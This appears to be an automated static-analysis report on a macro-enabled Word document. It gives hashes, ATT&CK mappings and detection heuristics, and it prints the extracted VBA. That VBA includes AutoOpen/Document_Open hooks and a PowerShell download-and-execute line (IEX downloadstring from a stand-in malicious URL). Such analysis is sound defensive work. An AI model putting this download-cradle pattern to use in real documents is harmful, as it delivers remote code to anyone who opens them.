Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 57718efac27db4fa…

MALICIOUS

Office (OOXML)

16.6 KB Created: 2021-05-26 14:05:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-05-29
MD5: b7788aaec4dbcc4831f1efc89a12b0e1 SHA-1: 57bb6876ac775d2eed63a7906c68f9ddad182341 SHA-256: 57718efac27db4fa387b721857118b67a31b8afb01ec865d2160f915b4c4cafe
358 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059.003 Windows Command Shell T1059.001 PowerShell T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains VBA macros that execute upon opening, as indicated by the AutoOpen and Document_Open heuristics. The VBA code directly calls cmd.exe and PowerShell, with the PowerShell command attempting to download and execute content from the URL 'http://my_malicious.com'. This indicates a downloader or droppper functionality, consistent with the ClamAV detection 'Doc.Downloader.Pwshell-10001336-0'.

Heuristics 9

  • ClamAV: Doc.Downloader.Pwshell-10001336-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Pwshell-10001336-0
  • VBA project inside OOXML medium 6 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Sub Macro2()
    Shell ("cmd.exe | HELLO")
    powershell.exe ""IEX ((new-object net.webclient).downloadstring('http://my_malicious.com')
  • PowerShell reference in VBA critical OLE_VBA_PS
    PowerShell reference in VBA
    Matched line in script
        Shell ("cmd.exe | HELLO")
    powershell.exe ""IEX ((new-object net.webclient).downloadstring('http://my_malicious.com')
End Sub
  • cmd.exe reference in VBA high OLE_VBA_CMD
    cmd.exe reference in VBA
    Matched line in script
    Sub Macro2()
    Shell ("cmd.exe | HELLO")
    powershell.exe ""IEX ((new-object net.webclient).downloadstring('http://my_malicious.com')
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Name = "NewMacros"
Sub AutoOpen()
    Macro1
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    End Sub
Sub Document_Open()
    Macro1
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://my_malicious.com In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahashIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 692 bytes
SHA-256: 922db3691609ce098b07cbe4c5d056f7b2ecd403cd1cb62dc39862719e7ffb34
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Sub AutoOpen()
    Macro1
End Sub
Sub Document_Open()
    Macro1
End Sub
Sub Macro1()
'
' Macro1 Macro
'
'
    Selection.TypeText Text:="This is a test of the Macro"
    Selection.TypeParagraph
    
End Sub
Sub Macro2()
    Shell ("cmd.exe | HELLO")
    powershell.exe ""IEX ((new-object net.webclient).downloadstring('http://my_malicious.com')
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 9728 bytes
SHA-256: 4e67c71292762ea4c5c7592de5d24b06c07ab14712f9c43477ff92d89a82f8ab
Detection
ClamAV: Doc.Downloader.Pwshell-10001336-0
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.